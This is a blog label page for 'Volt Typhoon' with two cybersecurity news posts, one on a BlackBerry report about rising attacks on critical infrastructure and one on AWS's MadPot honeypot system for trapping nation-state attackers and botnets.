Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Volt Typhoon. Show all posts
Volt Typhoon
BlackBerry Cyber Security malware Stakeholders Volt Typhoon

Cyber Attacks Threaten Essential Services

 


As per a recent report by BlackBerry, it was revealed that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. Shockingly, these providers bore the brunt of 62% of all industry-related cyberattacks tracked from September through December. What’s more concerning is the 27% increase in the use of novel malware during this period, indicating a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the urgency for enhanced cybersecurity measures becomes evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. Additionally, VPN appliances remain highly attractive targets for state-linked threat actors, further stressing the need for heightened security measures across all sectors.

The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, it is imperative for organisations to prioritise cybersecurity measures and stay cautious against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


Read more »
Volt Typhoon
APTs AWS Cyber Security DDoS botnets honeypot system MadPot Sandworm Security Vulnerabilities Threat Intelligence Volt Typhoon

AWS Employs MadPot Decoy System to Thwart APTs and Botnets

 

Amazon Web Services (AWS), a prominent player in cloud computing, has unveiled its internal defense system, MadPot, which has proven effective in luring and trapping malicious activities, including those orchestrated by nation-state-backed Advanced Persistent Threats (APTs) such as Volt Typhoon and Sandworm.

Conceived by AWS software engineer Nima Sharifi Mehr, MadPot is described as an advanced network of monitoring sensors equipped with automated response capabilities. This system ensnares malicious actors, monitors their actions, and generates protective data for various AWS security products.

MadPot is ingeniously designed to mimic numerous plausible targets, thwarting Distributed Denial of Service (DDoS) botnets, and preemptively blocking formidable threat actors like Sandworm from compromising AWS customers.

According to AWS, the sensors are vigilant over a staggering 100 million potential threat interactions and probes daily worldwide. Out of these, about 500,000 are identified as malicious activities, and this colossal trove of threat intelligence is meticulously analyzed to provide actionable insights on potentially harmful online activities. 

The response capabilities automatically shield the AWS network from identified threats, and they also reach out to other companies whose infrastructure is being exploited for malicious purposes.

In the case of Sandworm, the honeypot effectively intercepted the actor's attempt to exploit a security vulnerability in WatchGuard network security appliances. AWS not only identified IP addresses but also other distinct attributes linked to the Sandworm threat involved in the attempted breach of an AWS customer.

MadPot's remarkable capability to simulate a range of services and engage in extensive interactions enabled AWS to gather additional insights about Sandworm campaigns. This included specific services targeted by the actor and post-exploitation commands initiated by them. Armed with this intelligence, AWS promptly informed the affected customer, who took swift action to rectify the vulnerability.

Furthermore, AWS highlighted that the data and insights gathered by MadPot are harnessed to enhance the efficacy of their security tools, including AWS WAF, AWS Shield, AWS Network Firewall, and Amazon Route 53 Resolver DNS Firewall. These are complemented by detective and reactive services like Amazon GuardDuty, AWS Security Hub, and Amazon Inspector.
Read more »
Subscribe to: Posts (Atom)